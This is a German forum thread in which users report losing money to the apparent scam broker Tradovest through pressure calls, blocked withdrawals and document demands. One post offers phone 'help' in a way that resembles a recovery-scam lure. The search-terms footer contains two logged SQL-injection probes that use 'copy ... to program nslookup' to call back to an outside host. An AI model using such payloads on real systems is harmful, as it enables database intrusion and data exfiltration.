Tradovest: Hat hier jemand Erfahrungen?


Seite 2 von 2 ErsteErste 1 2
Ergebnis 21 bis 36 von 36
  1. #21
    Unregistriert

    Tradovest Betrug !!!!!

    Habe im Juni 250,- € eingezahlt. Noch vor der Einzahlung rief mich ein Herr Vater an und erklärte mir wie die Einzahlung funktioniert und welche Dokumente ich vorab einreichen muss. Habe alles erledigt. Ein paar Tage später bekam ich wieder einen Anruf, dieses mal von einem anderen Herren. Alle Anrufe kamen aus England. Mir wurde gesagt, dass mit 250,- nichts zu machen ist. Der Herr am Telefon war sehr sauer, als er merkte, dass er seine Zeit verschwendet hat. Dies teilte er mir auch unmissverständlich mit. Ich sagte ihm daraufhin, dass ich die 250,- € zurückgebucht haben möchte und er meinte ich solle über den Button Auszahlung gehen. Dies tat ich. Es wurde auch einen Monat später kein Geld zurückgebucht. Stattdessen bekam ich einen Anruf, dieses mal von einer Dame die mir sagte, dass ich das Handelskonto nur schließen kann, wenn ich einmal getradet habe. Sie riet mir sofort zu einem bestimmten Trade und meinte dass ich morgen früh ein Gewinn von ca. 40 € haben werde und mir dann mein Geld auszahlen lassen kann. Ich habe die Position geöffnet. Nach einer Minute war die Position geschlossen und das Handelskonto steht seit dem auf €-295.96 !?! Nun kann ich gar nichts mehr auszahlen lassen und habe nun die Befürchtung, dass monatlich Kotoführungsgebühren etc. auflaufen ...

    SO EIN RIESEN !!! B E T R U G !!!

    Das Handelskonto könnte übrigens nur ein Account-Manager schließen, den man natürlich nicht erreichen kann ! Auf E-mails wird grundsätzlich nicht geantwortet und die angegebene Telefonnummer gibt es nicht !

  2. #22
    Unregistriert

    Tradovest Betrug

    Also,mir geht es genauso. Habe mehre 100€ verloren.
    Habe mehrmals einen Antrag auf Auszahlung gestellt es gibt keine Antwort,
    auch der Support reagiert nicht nicht auf Anfragen.
    Ähnlich verhält es sich mit trade vemarkets.
    Es gibt keine Verbindung zu diesen Leuten.
    Wenn man einzahlt hat man schon verloren.
    Also Hände weg-die stecken alle unter eine Decke.

    MFG

  3. #23
    Unregistriert

    Daumen runter ..........

    na ausgezeichnet...bin auch mit 250 "drinnen"...von dem habe ich noch die hälfte..... mindestauszahlung, wenn überhaupt möglich, 250€ ....

    leider gottes "bezahle" ich immer die schule des Lebens :P

    tut mir echt leid für die leute die hier mehr investiert haben....der "Broker" macht echt Druck am Telefon.....mich sollte er demnächst anrufen...da werde ich ihm ein liedchen singen

    lg an alle

  4. #24
    Unregistriert

    Idee auch reingefallen aber bin jetzt raus

    Hallo Zusammen

    Ich bin auch reingefallen und habe die 250 Euro eingezahlt.
    Habe dann am ersten Tag aber sofort selber manuell gehandelt und habe mit Glück dann nach einer Handelstransaktion wieder etwas über 250 Euro auf dem Konto. Dann habe ich sofort die Auszahlung beantragt.
    Herr Weber rief mich dann einen Tag später an und wollte mit mir über grössere Einzahlungen sprechen; er wusste noch gar nicht, dass ich schon selber manuell gehandelt hatte und die Auszahlung beantragt habe.
    Als ich das ihm sagte, meinte er nur, dass ich das Geld nicht auszahlen könne, da ich zuerst irgendwelche Level erreicht haben muss.
    Er wurde immer lauter und aggressiver und als ich ihm gesagt habe, dass dies sonst ein Betrug sei, hängte er auf.
    Ca. 10 Tage danach hatte ich die 220 Euro wieder auf meiner Karte (30 Euro Gebühren).
    Scheinbar habe ich Glück gehabt.
    Das Konto habe ich per Mail schließen lassen.

    Viel Glück !

  5. #25
    Unregistriert

    Tradovest

    Mir ist es so ähnlich gegangen.
    Ich hatte mich bei Bitcoin Trader angemeldet, und das finanzielle läuft alles über Tradovest.
    Ich habe auch die 250€ Anzahlung gemacht, und habe 2 Trades versucht. Diese sind voll in die Hose gegangen.
    Nachdem ich bemerkt, habe das diese Plattform der größte Schwachsinn ist wollte ich mein Restgeld zurückbuchen.
    Da es nicht funktioniert hatt, habe ich ihnen eine Mail geschrieben die Antwort war, das ich mein Konto verifizieren muss.
    Habe ich auch getan wie bei anderen Brokern. Kopie des Führerscheins und Kopie einer Abrechnung.
    Hatt dann aber immer noch nicht funktioniert. Als Antwort kam nochmals das sie eine Kopie (Vorder und Rückseite) meiner Kreditkarte benötigen sonst können sie nicht meine Identität überprüfen.

    Kompletter Schwachsinn und Riesenbetrug.

  6. #26
    Richard
    Hallo,
    ich bin auch bei den Gutgläubigen, ziemlich naiv, aber jetzt nicht mehr zu ändern. Es wäre natürlich schon noch ärgerlicher, wenn man nicht wenigstens das eingezahlte Geld wieder zurück bekäme. Hat denn jemand schon mal mit dem Verbraucherschutz Kontakt aufgenommen?? Die müssten ja zumindest die vorhandenen Guthaben zurück überweisen.

  7. #27
    Unregistriert
    Musterfeststellungsklage ab morgen in Deutschland möglich

  8. #28
    Unregistriert

    Tradovest

    nicht berechtigt ist, konzessionspflichtige Bankgeschäfte in Österreich zu erbringen. Es ist dem Anbieter daher der gewerbliche Handel auf eigene oder fremde Rechnung (§ 1 Abs 1 Z 7 BWG) nicht gestattet.

  9. #29
    Carlos
    Hallo ruft mich am 015122342708 kann helfen ihr seit alle viel betrogen belogen wurden klar möchte euch kein Geld Versprechen aber eure Ehre und wut mehr über Telefon

  10. #30
    Tom

    Risikoausschlusserklärung

    Es gibt bei tradovest eine sogenannte Risikoausschlusserklärung:
    "Die Nutzung der Webseite und der angebotenen Dienstleistungen geschieht auf Ihre eigene Gefahr und das Unternehmen haftet nicht für Schäden oder Verluste jeglicher Art, die aufgrund von Veränderungen oder Ergänzungen, der Beendigung oder Aussetzung und/oder Stilllegung der Website oder der auf der Website angebotenen Dienstleistungen, entstehen können. Das Unternehmen haftet nicht für Schäden oder Verluste, die Ihnen entstehen, wenn Sie Inhalte von Webseiten nutzen, die mit unserer Seite verlinkt sind. Die Links Dritter, von Dienstleistungen, Ressourcen oder Informationen, die wir über die Website zur Verfügung stellen, unterliegen nicht unserer Kontrolle. Wir übernehmen keine Gewährleistung für die Dienstleistungen, Ressourcen und Informationen Dritter und wir haften auch nicht für Ihre Nutzung der Dienstleistungen, Ressourcen oder Informationen Dritter.

    Sie bestätigen ausdrücklich, dass Sie diese Webseite auf eigene Gefahr nutzen. Weder wir, noch einer unserer jeweiligen Angestellten, Agenten oder Lizenznehmer garantieren dafür, dass diese Website kontinuierlich oder fehlerfrei verfügbar sein wird; des Weiteren übernehmen wir keine Garantie für die möglicherweise zu erzielenden Ergebnisse, die durch die Nutzung dieser Website erreicht werden können."
    Insofern lassen sich höchstwahrscheinlich keine Rechtsansprüche durchsetzen.

  11. #31
    Unregistriert

    Böse Betrug hoch 3

    lasst die Finger davon die 250.-€ die ich investiert habe, Gott sei Dank kein Vermögen, sind weg
    ärgerlich das man doch auf sowas rein fällt
    keine Antwort auf E.-Mails keine gültige Telefon Nr. alles getürkt

  12. #32
    Unregistriert

    weckruf !

    man leute... ich staune immer wieder, wieviele menschen immer noch an den weihnachtsmann glauben... da kommt irgendwo jemand daher und verspricht euch das blaue vom himmel runter... und ihr fallt drauf rein und schmeisst ihm eure sauer verdiente kohle in den rachen...fragt sich hier keiner, warum diese menschen diese "narrensichere" methode um reich zu werden nicht dazu verwenden, um SELBST reich zu werden?... sondern stattdessen zum barmherzigen samariter werden um in kuerzester zeit moeglichst viele menschen zu millionaeren zu machen?... mal im ernst... glaubt ihr wirklich, dass es sowas gibt?.... naja... es gibt eine narrensichere methode um mit wenig arbeit schnell reich zu werden...man erzaehlt anderen menschen solche lügen und betruegt sie dann um ihr geld 😂😂

    tatsaechlich will ich keinem zu nahe treten... wuensch auch keinem was schlechtes... aaaber... IHR HORNOCHSEN.... WERDET MAL WACH UND TRETET EURE ROSAROTE BRILLE IN DIE TONNE !!!

  13. #33
    Unregistriert

    Finger weg

    Ich kann mich nur anschließen!! Auf keinen Fall investieren! Bei mir waren es zum Glück nur 250 Euro aber als es dann nur noch 20 Euro waren und ich erst mal 2 Wochen nichts gemacht hab - war auf einmal mein Geld weg.

    Außerdem wurde ich von dem "Profi" der als zweites angerufen hat beleidigt weil ich Pendlerin zur Arbeit bin. Er sagte, dass ich dumm wäre mir keinen Job in meiner Nähe zu suchen. Sowas muss man sich nicht bieten lassen.

    An alle, die überlegen da zu investieren: Nein bloß nicht ! Wenn ihr Geld verlieren wollte spendet es lieber.

    Grüße

  14. #34
    hd.thiele@t-online.de

    Böse Kündigung

    Zitat Zitat von Unregistriert Beitrag anzeigen
    Ich habe bisher nur 250€ eingezahlt und habe es mir kurz darauf anders überlegt. Habe noch gar kein Trade betrieben. Eine Auszahlung ist leider nicht möglich. Seit 2 Wochen schreibe ich an Tradovest und dem ,,Handelsexperten", der da seine Zustimmung geben muss, dass ich zu meinem Geld kommen kann. Er soll nun bis zum Monatsende im Urlaub sein angeblich. Das ist alles sehr
    komisch. Werde rechtliche Schritte gehen.
    Hallo, ich bin ebenfalls darauf reingefallen,
    hatte noch 250,-€ auf dem Konto! Aber monatlich werden es immer weniger, ich glaube Kontogebühren! Teilen Sie mir einmal mit ob Sie da raus gekommen sind.
    Gruß.

  15. #35
    Unregistriert

    Daumen runter Finger weg

    funktioniert sehr gut bis zur ersten Rückzahlung- dann ist das Konto plötzlich auf Null

  16. #36
    Unregistriert

    Böse Tradovestbtrug



    Achtung Paul Weber , Betrüger vor dem Herrn !!! 11.02.219
    Pralt mit seinem Kontostand von 5 Millionen .
    Soetwas sollte gleich Mißtrauen hervorrufen .
    Nachdem er gemerkt ,ist bei mir nichts mehr zu holen , gab es keine Möglichkeit ihn zu kontaktieren
    Der Support reagiert weder auf Mails noch auf Telefonate .
    Mein ist gesperrt nachdem Ich mein Paßwort ändern wollte .
    Sehe also nicht mehr was geschieht , weil ich mich einloggen kann .
    Ist vielleicht alles nur eine Vorspiegelung falscher Tatsachen um Menschen heiß zu machen .

+ Antworten
Seite 2 von 2 ErsteErste 1 2

Ähnliche Themen zu Tradovest: Hat hier jemand Erfahrungen?


  1. EuropeFX: Hat jemand bereits Erfahrungen gemacht?: Hey Trader! :) ich bin auf der suche nach einem guten und vorallem ehrlichen Forex Trading Broker und dabei auf Europe FX gestoßen. Das Problem an...



  2. Man muss einfach jemand finden der sich damit auskennt .. ..: man muss ja immer mal wieder zugeben http://www.aktienboard.com/forum/images/smilies/redface.gif _das andere besser sind als man selber :cool:...



  3. xTrade Forex Broker: Hat jemand Erfahrungen gemacht?: Hallo. Ich bin derzeit wieder nach einer kleinen Trading-Pause auf der suche nach einen zuverlässigen Forex-Broker. Aus der Werbung ist mir dann...



  4. Seltene Erden Aktien und Kupferaktien gesucht? Jemand Tipps?: Seltene Erden Aktien sind ja vorallem derzeit wegen China sehr im Gespräch und haben anscheinend großes Potential. Allerdings kenne ich nicht soviele...



  5. Kann mir jemand etwas mehr über Investmentfonds sagen?: Ich habe mich ein wenig im Internet darüber informiert, und es scheint mir als eine gute Geldanlage zu sein. Bevor ich aber mein Geld in...


Besucher kamen mit folgenden Begriffen in das Forex Forum:

testing

tradovesttradovest erfahrungentradovest erfahrungwann ist tradovest erfundentesting;copy (select ) to program nslookup dns.sqli.061188.232-24088.232.d5dad.1.bxss.metesting;copy (select ) to program nslookup dns.sqli.061188.232-23984.232.003b6.1.bxss.metradovest konto schließentradovest.com erfahrungbroker tradovest erfahrungen

Stichworte